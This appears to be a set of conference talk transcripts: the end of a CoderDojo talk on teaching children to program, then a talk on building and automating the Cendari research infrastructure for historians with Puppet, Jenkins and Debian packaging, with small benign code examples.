we go through with the kids. They can program this game themselves, and they can, for example, control how much gravity there is in the game. Some kids will play with the gravity setting for an hour. They won't change anything else; they just make it bigger and bigger, or smaller and smaller, and say: I can fly now! I can fly! – and they are happy. They have only changed one number in a big program, and that is perfectly fine. Some kids want to know more and really want to build the game. And then there is one thing that one of our mentors brought in, which was the idea: hey, just let the kids create their own figures and their own textures for the game. And that is very, very simple. We let them draw on paper, then we take a phone and snap a picture, open it in a program and cut the figure out – and now we have a character. And that is something the kids find thrilling. Because when they program somebody else's game, they don't have that feeling of ownership: when they are at the dojo for the first time, they see a game, but they have no control over what is in the game. But when the game is built from their own figures, it is their own game. And that works really, really well. Even a very young kid, seven or eight years old, who can't really program yet, can create their own game this way – and they will show it to everyone, and they will be very proud.
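The talk does not say which starter code the mentors' little 2D game uses, so the following is only a minimal sketch of the idea in plain JavaScript: a tiny update loop in which `gravity` is the one number the kids keep changing.

```javascript
// Minimal jump-and-gravity loop; gravity is the single value the kids tweak.
var gravity = 0.5;   // try 0.05 ("I can fly!") or 5 (you can barely jump)
var player = { y: 0, velocity: 0, onGround: true };

function jump() {
  if (player.onGround) {
    player.velocity = -10;   // negative means upwards in this sketch
    player.onGround = false;
  }
}

function update() {
  player.velocity += gravity;    // gravity pulls the player back down
  player.y += player.velocity;
  if (player.y >= 0) {           // 0 is the ground level here
    player.y = 0;
    player.velocity = 0;
    player.onGround = true;
  }
}

// In a real browser game this loop would be driven by requestAnimationFrame
// and the player would be drawn onto a <canvas> every frame.
setInterval(update, 16);
document.addEventListener('keydown', jump);
```

Changing that single `gravity` number is exactly the kind of small, safe edit inside a bigger program that a kid can happily play with for an hour.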
But then the kids want to crank up the number of stars. They go up to 10,000, then 100,000, and the browser really struggles. This one is moderate, I would say. But in this game the character is Yoda, and he is chasing Darth Vader. In the original trilogy. I will only show a small part; it works the same way, there are just more stars, but you can still run around and around. I stopped the video here because it gets a bit much, but that's okay. Maybe. Yes, exactly. Okay, so these are some of the things we have tried. We also have kids who program Android apps and other things. Those kids already bring the knowledge with them; they use their mentors as a help line. They come and say: I don't understand how to do these two things – and then they learn it on the spot. And this here is a very different app that Leo built. It is a web application with a Node.js backend and a jQuery frontend where you manage your to-dos – your own, or someone else's. What you see here is one of the lists in the app. It is a very simple app, a very simple system: every task you create can be switched between the two states, still to do and done. You can also add more. If you want "take out the trash" on the list, you select it here, and now you have to take out the trash. You can simply change items, you can share a list with other people and add other people to it, you can create new lists and delete others, and you can assign the to-dos. It is designed with a tablet in mind: the touch targets are big, so you can comfortably hit them with your finger on a tablet. This is an example of something we built at the dojo. It did not happen in four hours – it happened over many dojos, and there is more to come. That is Leo, he is sitting right there. That was a small demo. I could show you much more, but many things live on other people's computers, so this is one of the things I can show you. To wrap this up, here are a few hints for mentors. The first rule is: don't touch the keyboard. That is true for the mentors – let the kids type on their own keyboard. You can tell them what to type, but don't type it for them. If you do the typing, then you wrote the software, not them. If they type themselves, they learn much more and they stay much more focused. If you sit there and type and type and type, the kid simply stops paying attention. So: just don't touch the keyboard. It is also okay to skip details. You are working with an eight-year-old on their very first website; they don't understand what a function is, and they don't need to. Skip the details and concentrate on the things that are fun for that particular kid. You want to inspire them. If they want to dig deeper, they will have to learn more later on their own, but for now you want to inspire them and answer their questions – without drifting into the philosophical depths of everything. It is not going into production. Yes. Okay.
Another thing I want to say very clearly: never tell them it's easy. Programming is hard. When you have been programming for a long time, you think it's easy – it is not. When you do it for the first time, it is hard. And if someone tells you it's easy and you still don't get it, you feel stupid. You don't want to tell them they are stupid, but that is what arrives. So please don't say it's easy. Say instead: I will explain it to you, or: don't worry about that part, we will get to it in a while. And as I said, you will never know in advance what will excite the kids. I would not have expected that some kids would play with gravity settings for an hour – I would not have expected it, but it happens. And don't tell them what is supposed to be super cool: what you think is cool is not necessarily what the kids find cool. If you are super excited about functional programming, maybe that is not it – they want to mess around and build stuff. So please keep that in mind. And finally, I would like to say thank you. Thanks to the person who got the dojo started: she asked me at the beginning whether I would take care of this thing I had never even heard of, a CoderDojo. I was pretty nervous going into my first three dojos and learned a lot, and without her I would never have done it. So thank you, Ellie – she is not here, but thank you anyway. Thanks to all the mentors, because without them this would not work. We now have 15 mentors, which I think is amazing, because they give their free time to teach kids, and I am glad about every one of them. Then to the companies that let us use their rooms – that is super cool. And of course to the kids, because without them it would not be half as much fun. So, that is the end of my talk, and we now have a little discussion. Thank you for the talk. We go to the discussion now; we start with questions, and then I will ask who wants to start a dojo, so people can connect. What are the prerequisites? Is it more than a budget, a room or a location? Or maybe some other organizations that you join? What are the real problems? Okay – I am not sure I understood that: the prerequisites for what? For making it stable? Okay, so the main thing for a dojo is to find a rhythm for your dojo. If you say... I would like to suggest a cooperation with sports clubs. They have regular training sessions, every day or two days a week, and we could combine that. Many kids ask us whether they can learn this; they naturally start with a website – they want their own website – and from there we can start the other things. We did this with a Python camp; that ran for just a year. We also did it at school, but also at the club: the kids know the place, they are familiar with it, and we have the mentors there. The project is the integration of sport and education, and we also want to add some coding, programming and so on. That is a very good idea. I think it is similar to the idea of asking youth clubs, because you go to a place where the kids already are, and if they are interested in the topic, that is a very good way. We should talk later – thanks. There is a question over there. I think you need to use the microphone. Yes, the rooms.
I am a mentor at the CoderDojo in Ghent. We had the same problem with too many kids – at times we had five times more kids than we actually had room for. What we did, because we work on a first come, first served basis, was to ask the parents who were already bringing their kids whether they would become mentors themselves, so we would have more mentors. With more mentors we can also run more dojos; we now have two CoderDojos every month. It is a bit different for us, because instead of one mentor for two kids we often have five kids per mentor. We also try to get the kids to help each other: when they have a question they raise their hand, and we don't just give them the answer – we encourage them to ask the other kids first, because if another kid has already solved the same problem, kids can sometimes explain it much better than we can. We use technical terms they don't understand, and another kid won't. That helps when you don't have enough mentors. But you still have to keep an eye on it, because the kids won't always ask each other on their own; you still have to walk around and ask whether somebody is stuck. But it is one way to run more CoderDojos. Another hint we also give to mentors is that you don't have to know everything. It is often a relief for the kids to see that even the mentor doesn't know everything; and if you don't know something, you can say so, or pull in another kid who has already solved it, because nobody knows everything. That is something we want to get across. Often we simply Google together for the things we don't know. That is what I wanted to add. More questions or comments? Yes, you can just go ahead. A microphone – I will hold it. Another hint, something we do at our CoderDojo: in the last 20 minutes we have a demonstration. We have a beamer, and the kids who want to can present what they built that day. We had the problem that in the two offices we are using at the moment there is no beamer, so the demonstrations became a bit more chaotic. But I think it helps a lot: on the one hand the kids who present get recognition for what they built, and on the other hand it is an inspiration for what you could do at the next dojo, because you have seen that someone your age can do it. That is something that also works very well for us. We also used to do an introduction round where everyone says their name, but the kids didn't really take to that, so we stopped it. I have a question: if the mentors bring their own laptops, shouldn't there be some standard toolset that they bring along, so the kids can get started more easily? Otherwise a kid who wants to write their own website probably first has to learn vi. Yes, that is true; vi is probably not the best editor to start with. We do two different things. We use the online IDE Cloud9. It has the big advantage that if you work on the mentor's computer and the kid wants to continue at home, all they have to do is log in. They can simply log in at home and have the same thing.
They have the same environment, and there is also a live preview feature, so the kids see right away what they have built and can keep working with it afterwards – that is a very good thing. The only downside is that if you are in an office where the Wi-Fi is not super stable, it will not be the best experience, because it needs a stable connection to work. The other setup we use is Atom, because Atom is free, you can just install this text editor, and it is easy to use. If a kid doesn't want to use it, they can always install something else later. But basically we use whatever the mentor likes – though usually not Vim, not Emacs and no IDEs. Yes, that's it. Hello, I am the organizer of the Munich CoderDojo. We use Lightbot to give the kids an idea of how a program is built up and how it runs on the computer. It is a very cool thing; we use it because the kids can also watch the code run there, step by step. We also use code.org, where HTML, CSS and JavaScript are put together. And we have many other links. Thanks. I will stop the questions and answers here. I have one question myself: who would like to do something with a CoderDojo, but hasn't yet? You can raise your hand. Where are you from? Perfect – there is one here in Cologne and one in Bonn; I can give you contact details. Hello! I know someone – you should talk to me. You? I know a man. Yes? Zurich. Zurich – sorry, I was expecting a German city and didn't understand it at first; I think in English it is Zurich. Okay, is anyone here from Zurich? Or does anyone know someone from Zurich? Sorry. But you can start one yourself – you have seen everything you need. There is an official CoderDojo website where you can find a link; yes, it's zen: zen.coderdojo.com is the website for searching for CoderDojos. You can find one there and get in contact – they will probably be happy about more mentors. Okay, cool. I am curious to see what gets started there. What? You want to steal my kids? No, the area is big enough. No – we will talk later. Cool. You? Essen. I don't think there is one in Essen yet – you have to start it. Do it. Stefan, where is he? I could connect you with someone; come to me after the talk. Maybe he can do one in Essen. Maybe. Okay, that's it. Cool. Then thank you very much for the talk.
|
CoderDojo is a worldwide initiative to teach kids how to program. Each one is organized individually and the organizer can choose how to do it. I will show you what we do at our Dojo in Cologne and share tips on how to organize a Dojo :)
|
10.5446/32445 (DOI)
|
Okay, hello everybody, good morning. May I welcome you to the first talk today. This is the science track – a new feature at FrOSCon; we want to have more science-related talks, and this is the first one in the series. And may I introduce to you Mr. Karsten Thiel. He is a mathematician, he studied in Göttingen – yes, Göttingen – and he did his PhD in Magdeburg. He is now in Niedersachsen at the Staats- und Universitätsbibliothek in Göttingen, where he supports science work, especially in the non-technical sciences. And so we are very interested in your talk. Thank you. Thank you. Okay, so I want to talk about our endeavors into research infrastructures. As was already said, I'm working on IT infrastructure in digital humanities at the State and University Library in Göttingen. And what I'm presenting here is what we did in the Cendari project, where we did technology work together with the French research institute Inria, King's College in London, the Serbian Academy of Sciences, us at the SUB Göttingen, and Trinity College in Dublin – so a rather international group of IT people. The project ran from 2012 to 2016 under funding by the European Commission. Research infrastructures, as defined by the European Commission, refers to facilities, resources, and related services used by the scientific community to conduct top-level research in their respective fields. So in our case, that means web services, web interfaces that users can use to advance their research. Distributed, in this sense, means that we have components running at different institutions, connected through either APIs or at least through centralized user authentication, so that users can switch from one application to the other and continue working on their data. In the humanities, we have a high variety of research questions, from historians, which is the main focus group of this talk, of this project, to people working on literature studies, languages, and so on. And there are lots of special-purpose solutions for every single one of those research questions, those research problems. And there's a strong focus on word processing – so quite a lot of what they do, they do in Microsoft Word. And one problem that this project was trying to address is access to resources that are held at various cultural heritage institutions, archives, libraries, and so on. Cendari is a project that built a virtual research environment targeted at historians; the name originally stood for an inquiry environment for research into historical studies. One aim was to integrate existing resources, existing sources around Europe, enabling access to so-called hidden archives. Many archives are still not accessible – well, their contents are not accessible through the internet. Very often, even the archives themselves don't have web pages where you can find much information about them. So it is still very hard to find the material that you want for your research. And a traditional problem of a historian is: he's traveling somewhere next month to visit a particular source, and what he would like to know is: is there an archive in the area that has something that relates to my research problems? Because while I'm there, I could go to that archive and look at that material. And that is really still a hard problem, to find out what archives there are and what they actually have in terms of content. Fostering transnational access – again, it's a European project, so we're working together collaboratively around Europe.
And one idea also is to have people from one country go to other countries and find resources there. The project had 14 partners from eight European countries – among them humanities scholars, computer scientists, and cultural heritage institutions themselves, archives and libraries. And we had two main focus areas: one was World War I, the other one was medieval research, which are quite different from each other, both in the content and questions they have and in the material available. So in medieval research, you have one page – that's a lot. Whereas for the First World War, you sometimes even have videos and things like that available in the archive, though very often not digitally. This is one view of what the application can do in the end. On the left, you have your project tree, and in the middle the text you're working on, which can be a transcript of a document from an archive, a scan, an image that you have. And what you see in the colors are results of the named entity recognition, applied automatically and then edited by the researcher. The colors indicate people and places: places are blue, people are red. And you see the list of people here; you can highlight them. If you hover over these bars, then they pop up here. You have – it's not that visible, but this is a map where you see the place that's currently selected. And people can share these projects with each other, work on them collaboratively, and at some point maybe even decide to make them available publicly. And it's all happening in the web browser. From the technical side, it looks a bit different – that's what we've been focused on. I'll explain this in a few minutes. So I said the project ran for four years. First, I'm going to tell you how we started out, and then I'm going to tell you how we tried to fix some of the problems we had. We started out with one virtual machine where everyone was playing around. Everyone had access, everyone had sudo rights, everyone did what they thought was the best idea – which didn't work that well, because everyone was interfering with everyone else: someone broke one config and nothing else worked. So we started to have more machines; every team had their own machine to play around on. That caused less interference, but things started to grow apart. Also, there was a long trial-and-error phase. Many, many different things were tried out, installed, removed, or partially removed, or just abandoned and left running for months or years. We also did manual EAD encoding. EAD is a standard for archival description – an XML standard. So people were manually writing – and when I say people, I mean historians, scholars – they were manually encoding XML files and tracking them in SVN. So they first had to learn how to write an XML file, then they had to learn how to use SVN. They used Oxygen – sorry, not open source. Things that happened were, for example, that they wanted to have an object with two IDs. Oxygen said: no, you can only have one ID on an element in this XML file. But, well, the historians know better – they want two IDs – which led to lots of problems later when we tried to actually parse those files and make them available in the interface. There was also a phase where we tried Semantic MediaWiki as an editing software, because, well, it's MediaWiki, which is basically Wikipedia – everybody knows and uses Wikipedia, so that's easy. And also, it's semantic, so we get all these super great semantic features. Yeah, well, that doesn't work automatically.
It's no magic – you have to actually do something, and that was more complicated than what was originally hoped. So, I said things grew apart. We had SLES machines, Ubuntu machines, and Debian machines. We had a SLES machine with a Debian chroot, because, you know, there's that one package that isn't available for SLES but is for Debian, and it's easier to set up a Debian chroot and install the package from there – because of upgrades and all. But no one was doing upgrades in the Debian chroot, because all the people who were doing upgrades to the system packages didn't even know there was a Debian chroot on there to look into. So it was basically the same as installing from source. We had applications installed from packages. We had applications compiled manually, directly on the server – again, things that people once did, completely forgot about, never wrote down, never told anyone else, and then left the project. And in terms of standards: well, installing from source usually doesn't give you automatic backup routines and things like that – even packages don't usually give you automated backup routines. Init scripts were missing, so when servers were rebooted for various reasons – a power outage in the data center or whatever – we had to write an email to that one developer who knew how to start that one database on that development server. And there were lots of experiments. One example: this is the actual URL they started to use for the reference to this schema file, with an IP address hardcoded in it. Yeah, that's not very sustainable. And that became a problem even before the end of the project, because we switched IPs for some reason. Collaboration – well, we had a kind of shared responsibility: one person was responsible for the one server, and another one was responsible for the other server. But in terms of the applications, it was not so clear once we started putting them together. So at first there were several silos, several applications, all working on their own. But we needed to combine them, and that started to cause problems, because they were all so very different. Again, documentation was incomplete, sometimes lacking entirely. Big risk of silos and knowledge loss – in particular knowledge loss, because it's a research project, and of the people paid to work on the project, the advisor, who's a professor at some institute, is not exactly paid by the project, because he has his salary; but he has the grant money to pay his PhD students, who sometimes finish their PhD and then leave, or even leave without finishing the PhD. So sometimes, in the middle of the project, the one developer who knew something has suddenly gone to SAP. And then it takes two weeks to actually find the source code he wrote. So we looked at something else: DevOps, the big buzzword, a clipped compound of development and operations – a culture, movement or practice that emphasizes collaboration and communication while automating the process of software delivery and infrastructure changes. That's what the English Wikipedia says. So what's important is collaboration, communication, and at the same time automation. And that's what we tried to use to fix at least some of the problems we had.
So when you have a research project across Europe with people from, as I said, France, Britain, Germany, Serbia – and the people working there are from yet different countries – you have all those cultural clashes in terms of how you work and what you think you should do or not. And all of those teams were working independently, because we're not a company that has one goal or something. These are researchers who have their research projects, and one of those projects is this Cendari project. And the goal is to get something that works, so that we can show it to the European Commission, in some sense. Of course, everyone wants there to be something that people can use, that has an added value. But at the same time, the one thing you get paid for is to deliver something that's presentable to the funder, no matter how great it is. The most important thing is that the funder approves of the result, because then you get another grant for the next project. So you have to have impact for your project to be valuable, but impact is not measured in the same sense as it is with big companies. Going back to the DevOps word: what we did was include the building of the architecture into our agile development processes, which the teams had individually started to use, and we tried to combine them into one process. And we also defined this infrastructure, in some sense. So what this picture shows is the front-end applications. Then we have in the middle our API layer that connects all the front-end applications to all the back-end applications – which basically came down to two back-end applications from originally six, because we realized we don't need that many. And then at the bottom layer, you have things like databases and storage. These are the core components, and these are some externally hosted services. I said it's a distributed infrastructure, so we have external services that are not part of this infrastructure; they existed before we started creating this, and they exist independently. One is this red box here, the NERD service, which does the named entity recognition and disambiguation. It's hosted by the French Inria developers, and we're only accessing it through an API. But these are all hosted internally, and you can switch between the applications. What are those applications? We have AtoM – an open source PHP application; the name stands for Access to Memory. It's a standard application from the Open Archive Initiative that's used to encode archival descriptions, where people can enter: well, there's an archive, this is the address, and this is what they have in terms of content – you can describe this. And what it puts out are those standard EAD files that we first tried to edit manually with an XML editor. CKAN is a Python-based repository software where all our data goes in. We have half a million data sets, or a bit more than that, in there, mostly harvested directly from archives through open standards if it's actual content. So we have descriptions on item level, which means: there's this image, which shows that person, held at this archive. But we also have more global things, just basic textual descriptions of an archive and its holdings. The main application, NTE, the Note-Taking Environment, which was the image I showed you, is forked from an application called Editors' Notes – Python, based on Django. Then we have our very own application, the LITF Conductor. That's the main backend component that does all the transformations.
And we have Pineapple, which is a browser for the triple store – we have a Virtuoso triple store in the backend, and this is the browser for that knowledge base. We're using MySQL, PostgreSQL, Redis, Elasticsearch, Virtuoso. So what we needed was a lot more communication and a lot of automation. And as I said, we're not talking about scale – we didn't need hundreds of those servers, and many times when you introduce automation it's because you have many servers. What we were interested in was defined state and reproducibility. And what we tried to do in order to get more communication was shorter sprints, more releases. We went from, well, maybe one release every six months to more or less weekly. We had weekly sessions with the developers and the historians who were using the current version of the software, talking about current issues and what the next steps were to fix something, to get closer to what the application was supposed to do. It was possible to create tickets directly from the application, so that users could say: well, this just failed for that and that reason. We introduced config management. We chose one Ubuntu version – this was two years ago, so we chose Ubuntu 14. We chose Puppet for config management. We set up a staging and a production environment, both managed through Puppet. We used Jenkins to build the software – and when I say build, with PHP, well, there's still some processing of the CSS files, Sass files, static files. And then we packaged everything as Debian packages with fpm, because they were very easy to version in terms of Puppet: you easily know which version you have installed, and you can easily go back to an older version if you need to. And we did this even for static files like the documentation, because it's just the easiest way to deploy your software. So what does it look like? We have the developer with his laptop, who pushes his changes to GitHub, which triggers a build on the Jenkins server, which creates the Debian package and puts it into an aptly Debian repository, and then we install it on the server. The server is managed by Puppet, for which we have our internal ChiliProject code hosting. And from that, you can create a Vagrant machine on your local laptop again, which looks, well, identical to the production system, with the obvious differences of data and things like passwords, host names, certificates. But up to that, it's identical. And you can also test your software against the latest versions from other people locally if you want to, or you can just push your changes to GitHub and they will go through the staging environment – I'll explain that in a moment. We had lots of mostly virtual meetings, because all across Europe it's very expensive to get people together, so mostly Skype sessions. Everything went into version control, including the code for the infrastructure. Everyone had access to everything. So still, every single developer was able to change the production Puppet code, was able to log into the server and manually make changes, which then caused different problems – but they learned that it was not a good idea. We had automated builds and tests upon code push. We installed our applications from one apt repository. The infrastructure and the applications were developed together: the image I showed you of how the infrastructure looks is something like the 10th iteration. Before that, we had many more backend applications.
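As a concrete illustration of that packaging step – the package name, version and paths below are invented for the example, not taken from the project's actual build jobs – an fpm call on the Jenkins server can look roughly like this:

```bash
# Turn the build output directory into a versioned Debian package.
# -s dir : the source is a plain directory
# -t deb : the target format is a .deb
fpm -s dir -t deb \
    -n cendari-nte \
    -v 1.4.2 \
    --prefix /usr/share/cendari-nte \
    -C build/ .

# The Jenkins job then uploads the resulting .deb into the staging
# component of the aptly repository; promoting it to production is
# just copying the same file into the production component.
```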
Things were moved around: in this image, there are actually two servers, the front office server and the back office server, which hold two different parts of the stack. Things were moved around, and all these changes happened simultaneously with the changes to the applications. And also on the second level: whenever we had a new version of a tool deployed, we could also change, for instance, its config file or things like that simultaneously with the change of the tool. We had the Vagrant machine, we had the staging and the production systems, and they were all basically identical except for the data – which is very important, because if you have a triple store with a few hundred thousand triples and a triple store with a few billion triples, they behave very differently. Elasticsearch is much more flexible in that respect than, for instance, other databases. Yeah, I said it several times: we had two environments, the staging and the production environment. They were created by two different branches in our Puppet Git repository, which means we had one staging branch; we first tried our changes there, and when we were satisfied with them, we merged them into the production branch, and then those changes went onto the production systems. Our package repository actually had two components, as they're called. Jenkins always uploaded the Debian packages into the staging component, and that's what the staging server used to install the packages – it always installed the latest package available from that component, or branch, of the repository. And when we wanted to deploy something to production, we just copied the Debian package from one part of the repo to the other, and then the production server would get that version too. Yeah, that allowed for coordinated changes: a new version of a component and changes to its config file all happened together. Some things we learned. Very nice is the reproducibility: we are now able to recreate the entire server from scratch if we need to, or if we want to. And if we need a test instance, that's something Puppet can do. It's no longer the case that we need that one person who knows how to deploy that one piece of software, who is unfortunately on extended sick leave and will only be back in a month, so that everyone has to wait for him to return to continue work on the project. In scientific terms, reproducibility of your software stack is very important. We have a defined state of the software, of the server, of the configuration. In some sense, this is provenance data on the infrastructure. It's of course not entirely complete, because depending on what level of provenance you need, it can be very important which version of which library you have installed, which we don't manage to that extent. So if you install an Ubuntu 14 today, there are differences to the Ubuntu 14 from two years ago. Well, the biggest thing is OpenSSL, which had quite a few changes over the years with drastic results – probably not that important to the applications that we're using, but still those are big changes in the infrastructure that we are not entirely managing here. We had shared ownership in the sense that most developers don't really care about all those OpenSSL problems, which cipher order you are implementing on the server, the NTP config, or what your firewall settings exactly are. From a developer's point of view, the best firewall setting is everything open, because then the developer can access everything and do what he wants.
But they still want to change something in their application's config file, add a setting for a new feature, things like that. And everyone was able to do that. And Puppet best practices can help a lot there – there is a talk about that tomorrow, I believe. And so we were able to share these things: developers didn't have to care about SSL ciphers, and they were able to set up their own things themselves. And one thing is that the security settings, like the firewall and so on, are important right from the start, even before you have all the user data in there. Because otherwise you end up in a situation where you never thought about it, and then you have all the user data and suddenly you realize that you have big holes somewhere. Which is also something you have to take care of. Config management causes a lot of overhead. It's harder to set up a server with config management than it is to just apt-get install something and be happy with it. You have to rethink how you work with your systems, because you no longer SSH into the server to make a change: you make the change in your Puppet code, you check that in with Git, then it gets deployed, and then hopefully the thing you want to happen will happen. In some sense, it's a new programming language you have to learn. And by you, I also mean system administrators, who usually don't consider themselves developers – and now they have to do programming. Also in the sense that they have to use Git and workflows like branching, because, as I said, we had two branches mapping to the different environments. And so changing that one setting in that one file becomes much more complicated. Of course, now you're changing all the servers. So if it's only two servers, maybe it's faster to do it by hand. But apart from that research infrastructure, we have more of them, and things like the NTP settings are identical on all of them. If we want to change them on 40 servers, that starts to get more complicated when you're doing it by hand. And also, Puppet – and most config management systems – will undo what you did manually. So if the developer SSHes into the system and just changes a setting, or if the admin does it – just SSHes into the system and changes a small setting to make something work – Puppet will revert that on its next run, and then it's broken again. So this led to some friction. People were afraid of the automation, because they never knew what would happen next. Well, of course, we knew what it was going to do – but the thing is that you can't oversee the whole Puppet code unless you're actually working on it all the time. And when you're using configuration management like Puppet, then you don't end up with the defaults – for example, the Ubuntu defaults in some settings – because the Puppet defaults are a bit different sometimes. And this can cause problems when you think: well, I just install the package, and then everything works. Because with the default setting in the Ubuntu package, it works – but with the default setting that gets pulled in through Puppet, it won't work. Things like that happened and took us some time to trace. And of course it's always the automation's fault, because the automation does things it's not supposed to do. But the other thing is also some sort of automation: the Ubuntu default, which is different from the SLES default, may not be the best setting either. There was also the complaint that it's far too early to put everything into config management.
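A minimal sketch of what that shared ownership can look like in Puppet – all class, package, file and port names here are invented, and the firewall resource assumes the puppetlabs-firewall module: the package, service and firewall rule are the ops side, while the one parameter is the kind of thing a developer can change with a small, reviewable commit.

```puppet
# Hypothetical profile: an application and its ops-level concerns side by side.
# Anything managed here is put back by Puppet on the next run if someone
# edits it by hand on the server.
class profile::nte (
  $api_url = 'https://api.example.org'  # developer-tunable, used in the template
) {
  package { 'cendari-nte':
    ensure => installed,
  }

  file { '/etc/cendari-nte/settings.ini':
    ensure  => file,
    content => template('profile/nte-settings.ini.erb'),
    notify  => Service['cendari-nte'],
  }

  service { 'cendari-nte':
    ensure => running,
    enable => true,
  }

  # Ops-owned: only the port the application actually needs is opened.
  firewall { '100 allow nte http':
    proto  => 'tcp',
    dport  => '8080',
    action => 'accept',
  }
}
```

A hand edit of that settings file on the server is reverted on the next Puppet run, which is exactly the friction described above.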
You can use config management very well to configure NTP, firewalls, Apache settings. But it's far too early to decide where the config file lives, what's in the config file, things like that – it's far better to do that at the end, like when you have two days left before the end of the project, then we can think about this. And I mentioned this before for system administrators: they usually don't see themselves as developers, so learning GitHub adds overhead there. One thing I've heard several times is: I don't know how to code well, I'm too embarrassed to show my code on GitHub. I can't possibly publish my little shell script that does something, because it's just hacked together in a few seconds. The other fear is that if we publish our configuration, everyone knows how we set everything up in exact detail, and they will find all the attack vectors that we overlooked – which is not entirely wrong. But on the other hand, someone who knows what they're doing is a problem anyway, and many people publish their configuration regardless, because many of these things you can find out from the outside if you know what you're looking for. And, as I said, our Puppet code isn't actually on GitHub in its entirety: for most of the configuration management, we're using an internal Git repository that not everyone has access to. Others do publish everything – the United Kingdom government has all of its Puppet code completely available on GitHub, well, obviously except for passwords and certificates and stuff like that. How we structured our Puppet code – though this is more Puppet-specific: first, we tried some custom abstractions, which basically model this image of our infrastructure that I showed you. We had these definitions of the front-end machine and the back-end machine, and on those were the components – our software that we installed – and they, in turn, relied on resources like databases and Elasticsearch. And if we decided to switch one component from one role to another – from the back end to the front end or something – we just had to change one line. And we had one module, in terms of a Puppet module, that we shared with the other research infrastructures we have, which sets up things like passwords and certificates, firewalls, and so on.
And there's data in there. So you have to keep installing software updates, package updates, security updates to be sure that everything will continue working and that everything is still secure. You have to maybe look at the code to fix something. And this is why we think, at least to some extent, this will help. It won't help us if there's a problem with the actual applications that our developers program. But it will at least give us some way of fixing things. I mean, those are Python PHP applications. If in two years' time we decide we have to move to a new operating system version, it's probably possible to recompile them on the new version and reinstall it on the new system. So the hope is that this will enable us to get that stage as well. But before that, at least we now have a centralized application, which is integrated into our other projects. One of them is called Daria, the Digital Research Infrastructure for the Arts and Humanities. It's a large European project that tries to sustain some of these projects, some of these infrastructures, keep them alive, keep installing security updates, monitor them if something breaks, like storage has disappeared, reboot the machine. And if it's really broken, decide on whether or not there are enough users to decide and invest some people time to go in and update things. And this became much easier with this aligned config management, where we had basically the very same layout, and we had to know where to look if we wanted to change something. We did this for Sandari and also for TechSquid, which is a German research infrastructure for literature research. Well, to come to the end, it does cost a lot of time initially, a lot of friction we also experienced. But later it paid off, because one thing we had was this feature of trusted automation. So we have one bug fixed in staging, and there's half an hour before this big workshop with 30 international historians coming in, and they all want to see how great the software is. But there's this one critical bug. We really need to get it down. Well, it's working in staging, so let's just deploy it to production, because the last 30 times it worked as well, and that time it did as well. So that was one of the good end results. And with that, I'm open to questions. Yeah? So the question was on the, we don't have a mic, so I'm repeating, the question was on named entity recognition and what training parameters we have and how to implement them. And with the puppet configuration, so the thing is that the named entity recognition is happening outside, so it's not managed by our puppet code. Inria is still developing that. They originally did some training with Wikipedia texts, which are a bit different from text that historians write. So what they then started working on was, so the interface has two steps. You click on a button and the automated named entity recognition runs through it, and then you can go in and fix the entities and decide, well, this is actually not a place, it's a person, or this is a person you forgot. And that gets then fed back into the named entity recognition to improve the results. But in terms of the parameters, I mean, if it's contents of, so in theory, if it's contents of a configuration file that doesn't have to change dynamically, then you can manage it with puppet. If it's something that changes dynamically over time, then you can't change it with puppet. So puppet always gives you access to the configuration, but not to the data. 
It's really hard to manage the data. So also what our puppet code not does is to, if you set up a new server, it will not initialize any databases. You have to do that. There are scripts, and it deploys the scripts to do that, but you have to manually decide to do it. Yeah? Doesn't that just say that it has changed in saving time? or other entities to enjoy this? Yeah. Would you just manage this? Or would you just want to work with this project? Yeah. So first question is a bit more on the change in mindset and the second was on putting this to different locations, different setups. Maybe on the second, we have not yet of both of those. I said we have two infrastructures like this now, TechSquid and Sendari. We always have one of those, but in theory it's possible to set it up again. And with TechSquid, we are in fact in discussion with a group from Switzerland on exactly that because they really want to keep their stuff in Switzerland and not on servers in Germany. In many cases, it's still easier to put it on servers that are at a university somewhere in Europe than to put it on Amazon AWS for instance, but it's still in sometimes politically important to have it in your own country. Changing the mindset. The problem is that it's very easy. You always know what you're changing in your config files. Sometimes you have installed your applications several times for your databases several times on that specific version of an operating system and you just look in, you know exactly what the file is, you just write something in there and then you're done. The problem that arises here is, I said we have two staging environments and they ask differences like what password they use or which database they use, where the server lives. And so you have to have ways to say, well, depending on if this code is applied on that server or on that server, it's different. And these abstractions is what makes it complicated to change something. You want to change one setting that's the same everywhere. That's probably very easy because you just open the file and write it in there. But if it depends on which server you're actually deploying the thing on, then you have put in variables that are then realized on the server depending on the host name for instance, which creates a lot of overhead. And that caused a lot of friction because it was much more complicated to change something. And also once someone decided on something, well, that was it. And so they were like, well, the code is all on GitHub, you can install it. There's a basic installation instructions which included the make file, which to compile static files required me to have an elastic search instance running with the correct elastic search index set up because on a production server that's anyway the case. So that's not a problem. And also in your development machine, you need that. But you don't need it on a Jenkins server. You just want to compile the static files. And this causes a lot of friction because you have to change how you're working. You can't just have one single make target that does everything. You need one specific make target to create the static files that don't have dependencies on things you don't really need to compile the static files. And then in terms of deploying that package that you create on the Jenkins server to your actual production server, you have changes. At first we had a Jenkins server that ran on Debian. 
And there are also some Node applications in there, and the Node libs, well, I'm not entirely sure, but /usr/lib and /usr/bin and, well, just bin somewhere: there's a difference between Ubuntu and Debian, and that caused broken links and things like that. So these things are hard. And that took a lot of time initially. But as I said, it paid off in the end, because it was easier to get a new version into production. No one was afraid to actually deploy that thing just half an hour before the workshop. That literally happened. Yeah? [Question from the audience.] So, Jenkins did run the tests if they were in, sorry, I'm repeating the question: are we using automated tests? If the script you run in Jenkins, or the Maven target, includes testing, then it will be run. But, well, the standard problem was that it was way more important to finish the product than to finish the tests, which will cause us a lot of problems if someone has to go in and actually change something. Yeah. But during the project, it was more like: the developer changed something, it worked on his machine, he deployed it to staging, it worked on staging, and he was sufficiently confident to push it to production. Yes? Why did you use so many different operating systems? Initially, yeah. Well, in the end we did. So, why were we using different operating systems in the first place: basically every team got their machine and they did what they wanted. That was how this happened. And SLES came in because of the university computing center we're using; that was their default. So they gave us SLES machines, some people reinstalled them with different operating systems, others didn't. That's how we ended up with the Debian chroot on one of them. Yes? Acceptance, yeah. Okay, so acceptance by humanities researchers. Most of the development was done by computer scientists, together with the researchers who joined us in those weekly test sessions and did the actual testing. They did not work so much on GitHub. What they did was: we originally had a JIRA instance where they were tracking things. I said we had data from these archives in our repository, and they had to go to those archives and talk to them so they would allow us to take their data into our database. And there were agreements signed and so on. And this they tracked from the beginning with JIRA. JIRA has this workflow engine where you can do things like that. So the first step was: a person goes out to the institute. Once this is all done, the ticket gets moved on to the project coordinator, who has to sign the paperwork with this archive. Then it goes on to the developer, who does the 